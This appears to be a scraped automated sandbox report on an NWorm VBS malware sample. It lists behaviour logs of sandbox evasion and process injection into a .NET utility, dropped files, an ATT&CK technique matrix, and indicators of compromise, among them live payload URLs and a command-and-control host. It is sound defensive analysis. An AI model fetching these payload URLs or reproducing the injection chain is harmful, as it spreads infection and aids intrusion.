Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -99245s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -99136s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -99026s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -98917s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -98808s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -98698s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -98589s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -98480s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -98370s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -98260s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -98151s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -98042s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -97932s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -97823s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -97714s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -97604s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -97480s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -97370s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -97261s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -97152s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -97042s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -96931s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -96823s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -96714s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -96589s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -96480s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -96370s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -96261s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -96152s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -96041s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -95933s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -95823s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -95714s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -95605s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -95495s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -95386s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -95277s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -95167s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -95057s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -94948s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -94839s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -94729s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1428	Thread sleep time: -94620s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5421	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3896	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Window / User API: threadDelayed 1756	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Window / User API: threadDelayed 8107	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IUGSPQTEVLEHZIDHGXNQCNHSLWPLEZEYTVKQTSPNFSUAGHIJDDWITOGIYIHRFQGEIXYB.VBS

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NWorm

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary

Jbx Signature Overview

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Oracle\Java\.oracle_jre_usage\cce3fe3b0d8d83e2.timestamp

C:\ProgramData\PPGNAUTZBFPXKJXSBSWEXL\PPGNAUTZBFPXKJXSBSWEXL.HTA

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_43abj5ks.ety.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okdetsc1.hcs.ps1

C:\Users\user\AppData\Local\Temp\tmp237D.tmp8904-10-12-2021.js

C:\Users\user\AppData\Local\Temp\tmp2B8A.tmp1991KLI.jar

C:\Users\user\AppData\Local\Temp\tmp3E50.tmp4093-10-12-2021.js

C:\Users\user\AppData\Local\Temp\tmp6475.tmpALNLKIGNQCUCWBSGJELSLUQCWNFCQJGCQJJJSOQVT.VBS

C:\Users\user\AppData\Local\Temp\tmpB97A.tmp1991.jar

C:\Users\user\AppData\Local\Temp\tmpCECD.tmp1991-10-12-2021.js

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\83aa4cc77f591dfc2374580bbd95f6ba_d06ed635-68f6-4e9a-955c-4899f5f57b9a

C:\Users\user\Documents\20220201\PowerShell_transcript.216041.NehoyPz8.20220201183750.txt

Static File Info

General

File Icon

Network Behavior

Windows Analysis Report
IUGSPQTEVLEHZIDHGXNQCNHSLWPLEZEYTVKQTSPNFSUAGHIJDDWITOGIYIHRFQGEIXYB.VBS

Source: C:\Windows\SysWOW64\wscript.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	System information queried: CodeIntegrityInformation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 406000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 408000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: A90008	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Memory written: C:\Windows\SysWOW64\icacls.exe base: AE0000	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Memory written: C:\Windows\SysWOW64\icacls.exe base: 8552D8	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Memory written: C:\Windows\SysWOW64\icacls.exe base: 8561E8	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Queries volume information: C:\Users\user\1991lock.file VolumeInformation	Jump to behavior

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	311 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	221 Scripting	1 Services File Permissions Weakness	1 Registry Run Keys / Startup Folder	1 Deobfuscate/Decode Files or Information	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	11 Command and Scripting Interpreter	Logon Script (Windows)	1 Services File Permissions Weakness	221 Scripting	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 PowerShell	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	121 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	23 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Services File Permissions Weakness	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Source	Detection	Scanner	Label	Download
7.0.aspnet_regbrowsers.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1140260	Download File
7.0.aspnet_regbrowsers.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1140260	Download File
7.0.aspnet_regbrowsers.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1140260	Download File
7.0.aspnet_regbrowsers.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140260	Download File
7.0.aspnet_regbrowsers.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1140260	Download File

Source	Detection	Scanner	Label
HttP://103.151.125.186/A/XADOUYJBEAAKTPUBATDKPHHPFWQWHBJ	100%	Avira URL Cloud	malware
http://103.151.125.186/C/Serverjdkd.txt	100%	Avira URL Cloud	malware
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://103.151.125.186/C/Ps1JDK.txt	100%	Avira URL Cloud	malware
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://103.151.125.186	100%	Avira URL Cloud	malware
moneyhope81.duckdns.org	0%	Avira URL Cloud	safe

Name	IP	Active	Malicious	Reputation
sonatype.map.fastly.net	199.232.192.209	true	false	unknown
github.com	140.82.121.4	true	false	high
moneyhope81.duckdns.org	37.120.141.147	true	true	unknown
canonicalizer.ucsuri.tcs	unknown	unknown	true	unknown
repo1.maven.org	unknown	unknown	false	high

Name	Malicious	Antivirus Detection	Reputation
http://103.151.125.186/C/Serverjdkd.txt	true	Avira URL Cloud: malware	unknown
http://103.151.125.186/C/Ps1JDK.txt	true	Avira URL Cloud: malware	unknown
moneyhope81.duckdns.org	true	Avira URL Cloud: safe	unknown

Name	Source	Malicious	Antivirus Detection	Reputation
HttP://103.151.125.186/A/XADOUYJBEAAKTPUBATDKPHHPFWQWHBJ	wscript.exe	true	Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.462983267.000001AD10063000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.450660208.000001AD00216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.369565083.000001AD6AE02000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
HttP://103.151.125.186/C/Ps1JDK.txt	wscript.exe, wscript.exe, 00000001.00000003.470737081.000001BBED357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.472638560.000001BBED364000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.473168494.000001BBED252000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.471383208.000001BBED360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.473162831.000001BBED250000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.473132648.000001BBEB518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.473248081.000001BBED368000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.473226905.000001BBED350000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451643862.000001AD006B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.455125627.000001AD00FDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451931858.000001AD00798000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451677265.000001AD006D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451854385.000001AD0074C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.450660208.000001AD00216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.454770397.000001AD00E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451774731.000001AD00719000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451897849.000001AD00783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451552612.000001AD0066C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.454796011.000001AD00E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.448721449.000001AD6AE73000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.450660208.000001AD00216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.369565083.000001AD6AE02000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.462983267.000001AD10063000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.462983267.000001AD10063000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.462983267.000001AD10063000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.462983267.000001AD10063000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://null.oracle.com/	javaw.exe, 00000017.00000003.723499246.0000000014C6B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000017.00000003.735983763.0000000014C94000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000017.00000003.683418915.0000000014C6B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000017.00000003.724166250.0000000014C84000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000017.00000003.735639129.0000000014C6B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000017.00000003.696189919.0000000014C94000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000017.00000003.708561274.0000000014C6B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://103.151.125.186	powershell.exe, 00000002.00000002.450660208.000001AD00216000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.450338563.000001AD00001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.450660208.000001AD00216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.369565083.000001AD6AE02000.00000004.00000020.00020000.00000000.sdmp	false		high

IP	Domain	Country	ASN	ASN Name	Malicious
103.151.125.186	unknown	unknown	135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true
37.120.141.147	moneyhope81.duckdns.org	Romania	9009	M247GB	true
199.232.192.209	sonatype.map.fastly.net	United States	54113	FASTLYUS	false
140.82.121.4	github.com	United States	36459	GITHUBUS	false